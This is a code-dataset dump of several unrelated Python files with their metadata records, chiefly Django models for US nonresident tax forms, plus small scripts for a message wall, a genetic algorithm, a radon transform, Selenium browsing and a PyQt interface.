models.BooleanField(default=False)\n F1040NREZSCHOILD1 = models.BooleanField(default=False)\n F1040NREZSCHOILD2 = models.BooleanField(default=False)\n F1040NREZSCHOILE = models.CharField(max_length=128)\n F1040NREZSCHOILF = models.BooleanField(default=False)\n F1040NREZSCHOILFc = models.CharField(max_length=128)\n F1040NREZSCHOILGa = models.BooleanField(default=False)\n F1040NREZSCHOILGb = models.BooleanField(default=False)\n F1040NREZSCHOILGc = models.DateField(null=True)\n F1040NREZSCHOILGd = models.DateField(null=True)\n F1040NREZSCHOILHa = models.IntegerField(null=True)\n F1040NREZSCHOILHb = models.IntegerField(null=True)\n F1040NREZSCHOILHc = models.IntegerField(null=True)\n F1040NREZSCHOILI = models.BooleanField(default=False)\n F1040NREZSCHOILIc = models.CharField(max_length=128)\n \n # Info fields\n INFOL01 = models.CharField(\"Your first name and initial\", max_length=128)\n INFOL02 = models.CharField(\"Last name\", max_length=128)\n INFOL04 = models.CharField(max_length=128, null=True)\n INFOL05 = models.CharField(max_length=128, null=True)\n INFOL06 = models.CharField(max_length=128, null=True)\n INFOL07 = models.CharField(max_length=128, null=True)\n INFOL08 = models.CharField(max_length=128, null=True)\n INFOL09 = models.BooleanField(default=False)\n INFOL10 = models.CharField(max_length=128, null=True)\n INFOL11 = models.CharField(max_length=128, null=True)\n INFOL12 = models.CharField(max_length=128, null=True)\n INFOL15 = models.CharField(max_length=128, null=True)\n INFOL16 = models.CharField(max_length=128, null=True)\n \n def __unicode__(self):\n return self.INFOL01 + \" \" + self.INFOL02\n \nclass modelSummary(models.Model):\n SUMMARY01 = models.CharField(\"Filing Status\", default=\"\", max_length=128)\n SUMMARY02 = models.IntegerField(\"Gross Income\", default=0)\n SUMMARY03 = models.IntegerField(\"Deductions:\", default=0)\n SUMMARY03a = models.IntegerField(\"Tax treaty exemption:\", default=0)\n SUMMARY03aa = models.CharField(\"country\", default=\"Hong Kong\", max_length=128)\n SUMMARY03b = models.IntegerField(\"Personal exemption\", default=0)\n SUMMARY03c = models.IntegerField(\"State and local income taxes\", default=0)\n SUMMARY03d = models.IntegerField(\"Student loan interest\", default=0)\n SUMMARY03e = 
models.IntegerField(\"Scholarship and fellowship grants\", default=0)\n SUMMARY04 = models.IntegerField(\"Taxable Income\", default=0)\n SUMMARY05 = models.IntegerField(\"Tax\", default=0)\n SUMMARY06 = models.IntegerField(\"Other taxes: Unreported social security and Medicare tax\", default=0)\n SUMMARY07 = models.IntegerField(\"Total Taxes\", default=0)\n SUMMARY08 = models.IntegerField(\"Tax payments and credit\", default=0)\n SUMMARY09a = models.IntegerField(\"Tax Refundable\", default=0)\n SUMMARY09b = models.IntegerField(\"Tax Due\", default=0)\n\nclass modelPostTaxInput(models.Model):\n\n # Schedule OI fields\n SCHOILA = models.CharField(\"A. Of what country or countries were you a citizen or national during the tax year?\", default=\"\", max_length=128, blank=True, null=True)\n SCHOILB = models.CharField(\"B. In what country did you claim residence for tax purposes during the tax year?\", default=\"\", max_length=128, blank=True, null=True) \n SCHOILC = models.BooleanField(\"C. Have you ever applied to be a green card holder (lawful permanent resident) of the United States?\", default=False)\n SCHOILD1 = models.BooleanField(\"A U.S. citizen?\", default=False)\n SCHOILD2 = models.BooleanField(\"A green card holder (lawful permanent resident) of the United States?\", default=False)\n SCHOILE = models.CharField(\"E. If you had a visa on the last day of the tax year, enter your visa type. If you did not have a visa, enter your U.S. immigration status on the last day of the tax year.\", default=\"\", max_length=128, blank=True, null=True)\n SCHOILF = models.BooleanField(\"F. Have you ever changed your visa type (nonimmigrant status) or U.S. immigration status?\", default=False)\n SCHOILFc = models.CharField(\"If you answered 'Yes,' indicate the date and nature of the change.\", default=\"\", max_length=128, blank=True, null=True)\n SCHOILGa = models.BooleanField(\"Canada\", default=False)\n SCHOILGb = models.BooleanField(\"Mexico\", default=False)\n SCHOILGc = models.DateField(\"Date entered United States (mm/dd/yy)\", blank=True, null=True)\n SCHOILGd = models.DateField(\"Date departed United States (mm/dd/yy)\", blank=True, null=True)\n SCHOILHa = models.IntegerField(\"2011\", default=0)\n SCHOILHb = models.IntegerField(\"2012\", default=0)\n SCHOILHc = models.IntegerField(\"and 2013\", default=0)\n SCHOILI = models.BooleanField(\"I. Did you file a U.S. income tax return for any prior year?\", default=False)\n SCHOILIc = models.CharField(\"If 'Yes,' give the latest year and form number you filed\", default=\"\", max_length=128, blank=True, null=True)\n \n # F8843 fields\n F8843L01A = models.CharField(\"1a. Type of U.S. visa (for example, F, J, M, Q, etc.) and date you entered the United States\", default=\"\", max_length=128, blank=True, null=True)\n F8843L01B = models.CharField(\"1b. Current nonimmigrant status and date of change (see instructions)\", default=\"\", max_length=128, blank=True, null=True)\n F8843L02 = models.CharField(\"2. Of what country were you a citizen during the tax year?\", default=\"\", max_length=128, blank=True, null=True)\n F8843L03A = models.CharField(\"3a. What country issued you a passport?\", default=\"\", max_length=128, blank=True, null=True)\n F8843L03B = models.CharField(\"3b. 
Enter your passport number\", default=\"\", max_length=128, blank=True, null=True)\n\n F8843L04Aa = models.IntegerField(\"2013\", default=0, blank=True, null=True)\n F8843L04Ab = models.IntegerField(\"2012\", default=0, blank=True, null=True)\n F8843L04Ac = models.IntegerField(\"2011\", default=0, blank=True, null=True)\n F8843L04B = models.IntegerField(\"4b. Enter the number of days in 2013 you claim you can exclude for purposes of the substantial presence test\", default=0, blank=True, null=True)\n\n F8843Teachers = models.BooleanField(\"Teachers and Trainees (Visa J or Q)\", default=False)\n F8843TeachersL05 = models.CharField(\"5. For teachers, enter the name, address, and telephone number of the academic institution where you taught in 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL06 = models.CharField(\"6. For trainees, enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07a = models.CharField(\"2007\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07b = models.CharField(\"2008\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07c = models.CharField(\"2009\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07d = models.CharField(\"2010\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07e = models.CharField(\"2011\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL07f = models.CharField(\"2012\", default=\"\", max_length=128, blank=True, null=True)\n F8843TeachersL08 = models.BooleanField(\"8. Were you present in the United States as a teacher, trainee, or student for any part of 2 of the 6 prior calendar years (2007 through 2012)?\", default=False)\n\n F8843Students = models.BooleanField(\"Students (Visa F, J, M, or Q)\", default=False)\n F8843StudentsL09 = models.CharField(\"9. Enter the name, address, and telephone number of the academic institution you attended during 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL10 = models.CharField(\"10. Enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11a = models.CharField(\"2007\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11b = models.CharField(\"2008\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11c = models.CharField(\"2009\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11d = models.CharField(\"2010\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11e = models.CharField(\"2011\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL11f = models.CharField(\"2012\", default=\"\", max_length=128, blank=True, null=True)\n F8843StudentsL12 = models.BooleanField(\"12. Were you present in the United States as a teacher, trainee, or student for any part of more than 5 calendar years?\", default=False)\n F8843StudentsL13 = models.BooleanField(\"13. During 2013, did you apply for, or take other affirmative steps to apply for, lawful permanent resident status\", default=False)\n F8843StudentsL14 = models.CharField(\"14. 
If you checked the 'Yes' box on line 13, explain\", default=\"\", max_length=128, blank=True, null=True)\n \n F8843Athletes = models.BooleanField(\"Professional Athletes\", default=False)\n F8843AthletesL15 = models.CharField(\"15. Enter the name of the charitable sports event(s) in the United States in which you competed during 2013 and the dates of competition\", default=\"\", max_length=128, blank=True, null=True)\n F8843AthletesL16 = models.CharField(\"16. Enter the name(s) and employer identification number(s) of the charitable organization(s) that benefited from the sports event(s)\", default=\"\", max_length=128, blank=True, null=True)\n F8843AthletesL16a = models.BooleanField(\"16a. Note. You must attach a statement to verify that all of the net proceeds of the sports event(s) were contributed to the charitable organization(s) listed on line 16.\", default=False)\n \n F8843Medical = models.BooleanField(\"Individuals With a Medical Condition or Medical Problem\", default=False)\n F8843MedicalL17A = models.CharField(\"17a. Describe the medical condition or medical problem that prevented you from leaving the United States\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL17B = models.CharField(\"17b Enter the date you intended to leave the United States prior to the onset of the medical condition or medical problem described on line 17a\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL17C = models.DateField(\"17c. Enter the date you actually left the United States\", blank=True, null=True)\n F8843MedicalL18a = models.CharField(\"I certify that:\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL18b = models.CharField(\"Name of physician or other medical official\", default=\"\", max_length=128, blank=True, null=True)\n F8843MedicalL18c = models.CharField(\"Physician's or other medical official's address and telephone number\", default=\"\", max_length=128, blank=True, null=True)\n \n # INFO fields\n INFOL04 = models.CharField(\"Number, street, and apt. no., or rural route (If you have a P.O. box, enter Box Number only)\", max_length=128, blank=True, null=True)\n INFOL05 = models.CharField(\"City, town or post office, state, and ZIP code.\", max_length=128, blank=True, null=True)\n INFOL06 = models.CharField(\"Foreign country name\", max_length=128, blank=True, null=True)\n INFOL07 = models.CharField(\"Foreign province/state/county\", max_length=128, blank=True, null=True)\n INFOL08 = models.CharField(\"Foreign postal code\", max_length=128, blank=True, null=True)\n INFOL09 = models.BooleanField(default=False)\n INFOL10 = models.CharField(\"Designee's name\", max_length=128, blank=True, null=True)\n INFOL11 = models.CharField(\"Phone no.\", max_length=128, blank=True, null=True)\n INFOL12 = models.CharField(\"Personal identification number (PIN) \", max_length=128, blank=True, null=True)\n INFOL15 = models.CharField(\"Enter your reponse here:\", max_length=128, blank=True, null=True)\n INFOL16 = models.CharField(\"Enter your reponse here:\", max_length=128, blank=True, null=True)\n\nclass modelF8843(models.Model):\n # F8843 fields\n F8843L01A = models.CharField(\"Type of U.S. visa (for example, F, J, M, Q, etc.) 
and date you entered the United States\", default=\"\", max_length=128)\n F8843L01B = models.CharField(\"Current nonimmigrant status and date of change (see instructions)\", default=\"\", max_length=128)\n F8843L02 = models.CharField(\"Of what country were you a citizen during the tax year?\", default=\"\", max_length=128)\n F8843L03A = models.CharField(\"What country issued you a passport?\", default=\"\", max_length=128)\n F8843L03B = models.CharField(\"Enter your passport number\", default=\"\", max_length=128)\n F8843L04Aa = models.IntegerField(\"2013\", default=0)\n F8843L04Ab = models.IntegerField(\"2012\", default=0)\n F8843L04Ac = models.IntegerField(\"2011\", default=0)\n F8843L04B = models.IntegerField(\"Enter the number of days in 2013 you claim you can exclude for purposes of the substantial presence test\", default=0)\n F8843L05 = models.CharField(\"For teachers, enter the name, address, and telephone number of the academic institution where you taught in 2013\", default=\"\", max_length=128)\n F8843L06 = models.CharField(\"For trainees, enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128)\n F8843L07a = models.CharField(\"2007\", default=\"\", max_length=128)\n F8843L07b = models.CharField(\"2008\", default=\"\", max_length=128)\n F8843L07c = models.CharField(\"2009\", default=\"\", max_length=128)\n F8843L07d = models.CharField(\"2010\", default=\"\", max_length=128)\n F8843L07e = models.CharField(\"2011\", default=\"\", max_length=128)\n F8843L07f = models.CharField(\"2012\", default=\"\", max_length=128)\n F8843L08 = models.BooleanField(\"Were you present in the United States as a teacher, trainee, or student for any part of 2 of the 6 prior calendar years (2007 through 2012)?\", default=False)\n F8843L09 = models.CharField(\"Enter the name, address, and telephone number of the academic institution you attended during 2013\", default=\"\", max_length=128)\n F8843L10 = models.CharField(\"Enter the name, address, and telephone number of the director of the academic or other specialized program you participated in during 2013\", default=\"\", max_length=128)\n F8843L11a = models.CharField(\"2007\", default=\"\", max_length=128)\n F8843L11b = models.CharField(\"2008\", default=\"\", max_length=128)\n F8843L11c = models.CharField(\"2009\", default=\"\", max_length=128)\n F8843L11d = models.CharField(\"2010\", default=\"\", max_length=128)\n F8843L11e = models.CharField(\"2011\", default=\"\", max_length=128)\n F8843L11f = models.CharField(\"2012\", default=\"\", max_length=128)\n F8843L12 = models.BooleanField(\"Were you present in the United States as a teacher, trainee, or student for any part of more than 5 calendar years?\", default=False)\n F8843L13 = models.BooleanField(\"During 2013, did you apply for, or take other affirmative steps to apply for, lawful permanent resident status\", default=False)\n F8843L14 = models.CharField(\"If you checked the 'Yes' box on line 13, explain\", default=\"\", max_length=128)\n F8843L15 = models.CharField(\"Enter the name of the charitable sports event(s) in the United States in which you competed during 2013 and the dates of competition\", default=\"\", max_length=128)\n F8843L16 = models.CharField(\"Enter the name(s) and employer identification number(s) of the charitable organization(s) that benefited from the sports event(s)\", default=\"\", max_length=128)\n F8843L16a = models.BooleanField(\"Note. 
You must attach a statement to verify that all of the net proceeds of the sports event(s) were contributed to the charitable organization(s) listed on line 16.\", default=False)\n F8843L17A = models.CharField(\"Describe the medical condition or medical problem that prevented you from leaving the United States\", default=\"\", max_length=128)\n F8843L17B = models.CharField(\"Enter the date you intended to leave the United States prior to the onset of the medical condition or medical problem described on line 17a\", default=\"\", max_length=128)\n F8843L17C = models.DateField(\"Enter the date you actually left the United States\", null=True)\n F8843L18a = models.CharField(\"Physician's Statement:\", default=\"\", max_length=128)\n F8843L18b = models.CharField(\"Name of physician or other medical official\", default=\"\", max_length=128)\n F8843L18c = models.CharField(\"Physician's or other medical official's address and telephone number\", default=\"\", max_length=128)\n\nclass modelInput(models.Model):\n \n # text input\n A01 = models.CharField(\"First Name\", max_length=128, blank=True, null=True)\n A02 = models.CharField(\"Last Name\", max_length=128, blank=True, null=True)\n \n # choose one\n CHOICES_Q01 = ((\"a\", \"Current Year\"), (\"b\", \"Prior Year(s)\"),)\n Q01 = models.CharField(\"Please select tax year\", max_length=128, choices = CHOICES_Q01, blank=True, null = True)\n \n # choose one\n CHOICES_Q01_01 = ((\"a\", \"2010\"), (\"b\", \"2011\"), (\"c\", \"2012\"),)\n Q01_01 = models.CharField(\"Please select a prior tax year\", max_length=128, choices = CHOICES_Q01_01, blank=True, null = True)\n \n # choose one\n CHOICES_Q02 = ((\"a\", \"Nonresident Tax Return\"), (\"b\", \"Social Security & Medicare Tax Refunds\"),)\n Q02 = models.CharField(\"Please select your service need:\", max_length=128, choices = CHOICES_Q02, blank=True, null = True)\n\t\n # choose one\n CHOICES_Q02_01 = ((\"a\", \"China\"), (\"b\", \"Mexico\"),)\n Q02_01 = models.CharField(\"Please select your country of origin: \", max_length=128, choices = CHOICES_Q02_01, blank=True, null = True)\n\t\n # read-only\n Q02_01_01 = models.IntegerField(\"Tax Treaty Amount:\", max_length=128, blank=True, null = True)\n\t\n # choose one\n CHOICES_Q03 = ((\"a\", \"1040NR-EZ\"), (\"b\", \"1040NR\"),)\n Q03 = models.CharField(\"Please select your forms:\", max_length=128, choices = CHOICES_Q03, blank=True, null = True)\n\t\n # choose one\n CHOICES_Q03_01 = ((\"a\", \"Single\"), (\"b\", \"Married\"),)\n Q03_01 = models.CharField(\"What do you want to file as?\", max_length=128, choices = CHOICES_Q03_01, blank=True, null = True)\n \n # read-only\n Q03_01_01 = models.IntegerField(\"Personal Exemption:\", max_length=128, blank=True, null = True)\n \n # read-only\n Q03_01_02 = models.IntegerField(\"Standard Deduction:\", max_length=128, blank=True, null = True)\n\n # choose many\n Q04 = models.CharField(\"Please select source of income:\", max_length=128, blank=True, null = True)\n Q04_a = models.BooleanField(\"W2 - check to expand\", max_length=128, default=False)\n Q04_b = models.BooleanField(\"1099G - check to expand\", max_length=128, default=False)\n\n W2L01 = models.IntegerField(\"Box 1: Wages, tips, other comp.\", blank=True, null=True, default=0)\n W2L02 = models.IntegerField(\"Box 2: Federal income tax withheld\", blank=True, null=True, default=0)\n W2L03 = models.IntegerField(\"Box 3: Social security wages\", blank=True, null=True, default=0)\n W2L04 = models.IntegerField(\"Box 4: Social security tax withheld\", blank=True, 
null=True, default=0)\n W2L05 = models.IntegerField(\"Box 5: Medicare wages and tips\", blank=True, null=True, default=0)\n W2L06 = models.IntegerField(\"Box 6: Medicare tax withheld\", blank=True, null=True, default=0)\n W2L12aB = models.IntegerField(\"Box 12a: Enter code and amount\", blank=True, null=True, default=0)\n W2L12bB = models.IntegerField(\"Box 12b: Enter code and amount\", blank=True, null=True, default=0)\n W2L15aA = models.IntegerField(\"Box 15a: State\", blank=True, null=True, default=0)\n W2L15bA = models.IntegerField(\"Box 15b: Employer's state ID number\", blank=True, null=True, default=0)\n W2L16A = models.IntegerField(\"Box 16: State wages, tips, etc.\", blank=True, null=True, default=0)\n W2L17A = models.IntegerField(\"Box 17: State income tax\", blank=True, null=True, default=0)\n W2L18A = models.IntegerField(\"Box 18: Local wages, tips, etc.\", blank=True, null=True, default=0)\n W2L19A = models.IntegerField(\"Box 19: Local income tax\", blank=True, null=True, default=0)\n W2L20A = models.IntegerField(\"Box 20: Locality name\", blank=True, null=True, default=0)\n W2L07 = models.IntegerField(\"Box 7: Social security tips\", blank=True, null=True, default=0)\n W2L08 = models.IntegerField(\"Box 8: Allocated tips\", blank=True, null=True, default=0)\n W2L10 = models.IntegerField(\"Box 10: Dependent care benefits\", blank=True, null=True, default=0)\n W2L11 = models.IntegerField(\"Box 11: Nonqualified plans\", blank=True, null=True, default=0)\n W2L14 = models.IntegerField(\"Box 14: Other\", blank=True, null=True, default=0)\n\n F1099GL01 = models.IntegerField(\"Box 1: Unemployment compensation OR Recipient's identification number:\", blank=True, null=True, default=0)\n F1099GL02 = models.IntegerField(\"Box 2: State or local income tax refunds, credits, or offsets\", blank=True, null=True, default=0)\n F1099GL03 = models.IntegerField(\"Box 3: Box 2 amount is for tax year\", blank=True, null=True, default=0)\n F1099GL04 = models.IntegerField(\"Box 4: Federal income tax withheld\", blank=True, null=True, default=0)\n F1099GL05 = models.IntegerField(\"Box 5: RTAA payments\", blank=True, null=True, default=0)\n F1099GL06 = models.IntegerField(\"Box 6: Taxable grants\", blank=True, null=True, default=0)\n F1099GL07 = models.IntegerField(\"Box 7: Agriculture payments\", blank=True, null=True, default=0)\n F1099GL08 = models.IntegerField(\"Box 8: Check if box 2 is trade or business\", blank=True, null=True, default=0)\n F1099GL09 = models.IntegerField(\"Box 9: Market Gain\", blank=True, null=True, default=0)\n F1099GL10aA = models.IntegerField(\"Box 10a: State\", blank=True, null=True, default=0)\n F1099GL10bA = models.IntegerField(\"Box 10b: State identification no.\", blank=True, null=True, default=0)\n F1099GL11A = models.IntegerField(\"Box 11: State income tax withheld\", blank=True, null=True, default=0)\n\n Q05_scholarship = models.IntegerField(\"Scholarship and fellowship grants excluded\", blank = True, null = True)\n Q05_student_loan = models.IntegerField(\"Student loan interest paid in current year and amount?\", blank = True, null = True)\n Q06_4137_8919 = models.IntegerField(\"Unreported social security and Medicare tax (4137/ 8919)\", blank = True, null = True)\n Q06_estimated_tax = models.IntegerField(\"2013 estimated tax payments and amount applied from 2012 return\", blank = True, null = True)\n Q06_1040C = models.IntegerField(\"Credit for amount paid with Form 1040-C\", blank = True, null = True)\n \n \n def __unicode__(self):\n return self.A01 + \" \" + 
self.A02\n \n ","sub_path":"app1040nrezlocal/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":26663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"443351852","text":"from Genotype import Genotype\nfrom Line import Line\nimport copy\n\nclass LineGenotype(Genotype):\n\n def __init__(self,n_genes=4,n_bases=False,genes=False,name=\"0.0\"):\n Genotype.__init__(self,n_genes=n_genes,n_bases=n_bases,genes=genes,name=name)\n\n def breed(self,mate,mutation_chance=1.):\n genes = []\n assert len(self.genes) == len(mate.genes), \"Mismatched number of genes, self: %i, mate: %i\"%(len(self.genes),len(mate.genes))\n for i in range(len(self.genes)):\n if (self.random() < mutation_chance): genes.append(copy.copy(self.genes[i]))\n else: genes.append(copy.copy(mate.genes[i]))\n offspring = LineGenotype(genes=genes)\n offspring.numerical_mutate()\n return offspring\n\n def eval(self):\n return Line(int(self.genes[0].code, 2),\n int(self.genes[1].code, 2),\n int(self.genes[2].code, 2),\n int(self.genes[3].code, 2),\n name=self.name)\n\n def to_string(self):\n to_return = \"(x1: %i, y1: %i), (x2: %i, y2: %i)\"%\\\n (int(self.genes[0].code, 2),int(self.genes[1].code, 2),int(self.genes[2].code, 2),int(self.genes[3].code, 2))\n return to_return\n","sub_path":"code/04/LineGenotype.py","file_name":"LineGenotype.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"53462198","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Users, Messages, Comments\n\n# Create your views here.\ndef index(request):\n if 'users_id' not in request.session:\n request.session['users_id'] = []\n return render(request, \"main/index.html\")\n\ndef signup(request):\n return render(request, 'main/signup.html')\n\ndef login(request):\n if request.method == \"POST\":\n models_response = Users.objects.login_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('main:index')\n else:\n user = {\n \"id\": models_response[1].id,\n }\n return redirect('/wall/{}'.format(user['id']))\n\ndef create(request):\n if request.method == \"POST\":\n models_response = Users.objects.create_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('main:signup')\n else:\n user = {\n \"id\": models_response[1].id,\n }\n return redirect('/wall/{}'.format(user['id']))\n\ndef wall(request, current_id):\n #adding user id to logged users list\n if current_id not in request.session['users_id']:\n request.session['users_id'].append(current_id)\n current_user = Users.objects.get(id=current_id)\n context = {\n \"user\": \"{}\".format(current_user.first_name),\n \"id\": current_id,\n \"all_messages\": Messages.objects.all().order_by('created_at'),\n \"all_comments\": Comments.objects.all().order_by('created_at'),\n }\n return render(request, 'main/wall.html', context)\n\ndef post_message(request, current_id):\n if request.method == \"POST\":\n models_response = Messages.objects.message_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('/wall/{}'.format(request.POST['user_id']))\n\ndef post_comment(request, current_id):\n if 
request.method == \"POST\":\n models_response = Comments.objects.comment_check(request.POST)\n if not models_response[0]:\n for error in models_response[1]:\n messages.error(request, error)\n return redirect('/wall/{}'.format(request.POST['user_id']))\n\ndef logout(request, current_id):\n if current_id in request.session['users_id']:\n request.session['users_id'].remove(current_id)\n return redirect('main:index')\n","sub_path":"Django/TheWall/apps/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"501739846","text":"import matplotlib.pyplot as plt\nimport tomopy\nimport numpy as np\nimport radonusfft\nN = 128\nNtheta = 128\nNs = 16\ntheta = np.float32(np.arange(0, Ntheta)*np.pi/Ntheta)\n\n\n# create class for the transform\ncl = radonusfft.radonusfft(Ntheta, Ns, N)\ncl.setobj(theta)\n# swig does not work with complex numbers, so array sizes are doubled 2*N\nf = np.zeros([Ns, N, N], dtype=\"complex64\")\n\n# real part\nf[:] = tomopy.misc.phantom.shepp2d(size=N, dtype=u'float32')+1j*np.fliplr(\n tomopy.misc.phantom.shepp2d(size=N, dtype=u'float32'))\n\n# fwd\n# memory for result\ng = np.zeros([Ntheta, Ns, N], dtype=\"complex64\")\n# run\ncl.fwd(g, f)\n\n# adj\n# memory for result\nff = np.zeros([Ns, N, N], dtype=\"complex64\")\n# run\ncl.adj(ff, g)\n\nf = np.complex128(f)\nff = np.complex128(ff)\ng = np.complex128(g)\n\n\n# adj test\nprint((np.sum(f*np.conj(ff))-np.sum(g*np.conj(g)))/np.sum(f*np.conj(ff)))\n\n\nplt.subplot(2, 2, 1)\nplt.imshow(np.squeeze(g[:, 4, :].real))\nplt.subplot(2, 2, 2)\nplt.imshow(np.squeeze(g[:, 4, :].imag))\n\nplt.subplot(2, 2, 3)\nplt.imshow(np.squeeze(ff[4, :, :].real))\nplt.subplot(2, 2, 4)\nplt.imshow(np.squeeze(ff[4, :, :].imag))\n\nplt.show()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"478892323","text":"# -*- coding: utf-8 -*-\n#COMECE AQUI ABAIXO\nn = 0\nfor j in range (10, 100, 1):\n n=n+1\n \nif 1==2:\n visual = [[' ',' ', ' '], [' ', ' ',' '], [' ', ' ', ' ']] \n #for i in range(0, 10, 1):\n a = str(input('Selecione a posição: '))\n if i%2==0:\n visual[int(a[0])][int(a[2])]='X'\n else: \n visual[int(a[0])][int(a[2])]='O'\n for i in range (0, 3, 1):\n print(str(visual[i][0]) + ' | '+ str(visual[i][1]) + ' | '+ str(visual[i][2]))","sub_path":"moodledata/vpl_data/380/usersdata/308/85650/submittedfiles/testes.py","file_name":"testes.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"333962445","text":"\n\n#calss header\nclass _POCKET():\n\tdef __init__(self,): \n\t\tself.name = \"POCKET\"\n\t\tself.definitions = [u'to put something into your pocket: ', u'to hit a billiard or snooker ball into a pocket: ', u'to take something for yourself, especially dishonestly: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_pocket.py","file_name":"_pocket.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"65534770","text":"#!/usr/bin/env python2.7\n\nfrom selenium import webdriver\nfrom 
selenium.webdriver.common.keys import Keys\nfrom time import sleep\n\n# geckodriver não precisa estar definido no path\ndriver = webdriver.Firefox(executable_path='/opt/geckodriver/geckodriver')\ndriver.get(\"http://www.python.org\")\nassert \"Python\" in driver.title\nelem = driver.find_element_by_name(\"q\")\nelem.clear()\nelem.send_keys(\"pycon\")\nsleep(2)\nelem.send_keys(Keys.RETURN)\nassert \"No results found.\" not in driver.page_source\ndriver.close()","sub_path":"simple-usage.py","file_name":"simple-usage.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"225043255","text":"from app import BasicApp\nfrom formula import Formula\n\nglobal string, i\n\ndef main():\n summ=0\n string = str(input('Ввод: '))\n string = string.split('--poly=')\n string = string[1].split(',')\n push=BasicApp(string, summ)\n push.run()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"OOP Files/Polynoms #3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"80"} +{"seq_id":"8810099","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 30 12:47:12 2020\r\n\r\n@author: Kai Jungsthöfel & Lars Schröder\r\n\"\"\"\r\nimport vtkplotlib as vpl\r\nfrom stl.mesh import Mesh\r\nimport numpy as np\r\nimport stl\r\nfrom stl import mesh\r\nimport math\r\nimport os\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QFileDialog, QCheckBox, QDialog\r\nfrom os.path import expanduser\r\n\r\n\r\n\r\n\r\n\r\nclass Ui_MainWindow(object):\r\n def setupUi(self, MainWindow):\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.setFixedSize(1011, 480)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n \r\n self.pushButtonGenerate = QtWidgets.QPushButton(self.centralwidget)\r\n self.pushButtonGenerate.setGeometry(QtCore.QRect(40, 210, 75, 23))\r\n self.pushButtonGenerate.setObjectName(\"pushButtonGenerate\")\r\n \r\n self.pushButtonExport = QtWidgets.QPushButton(self.centralwidget)\r\n self.pushButtonExport.setGeometry(QtCore.QRect(150, 210, 75, 23))\r\n self.pushButtonExport.setObjectName(\"pushButtonExport\")\r\n \r\n self.pushButtonDialog = QtWidgets.QPushButton(self.centralwidget)\r\n self.pushButtonDialog.setGeometry(QtCore.QRect(165, 440, 30, 20))\r\n self.pushButtonDialog.setObjectName(\"pushButtonDialog\")\r\n \r\n self.widget = QtWidgets.QWidget(self.centralwidget)\r\n self.widget.setGeometry(QtCore.QRect(32, 42, 209, 151))\r\n self.widget.setObjectName(\"widget\")\r\n \r\n self.formLayout = QtWidgets.QFormLayout(self.widget)\r\n self.formLayout.setContentsMargins(0, 0, 0, 0)\r\n self.formLayout.setObjectName(\"formLayout\")\r\n \r\n self.labelPropellerVariablen = QtWidgets.QLabel(self.widget)\r\n font = QtGui.QFont()\r\n font.setPointSize(12)\r\n self.labelPropellerVariablen.setFont(font)\r\n self.labelPropellerVariablen.setObjectName(\"labelPropellerVariablen\")\r\n \r\n self.formLayout.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.labelPropellerVariablen)\r\n self.labelL = QtWidgets.QLabel(self.widget)\r\n self.labelL.setObjectName(\"labelL\")\r\n self.formLayout.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.labelL)\r\n \r\n 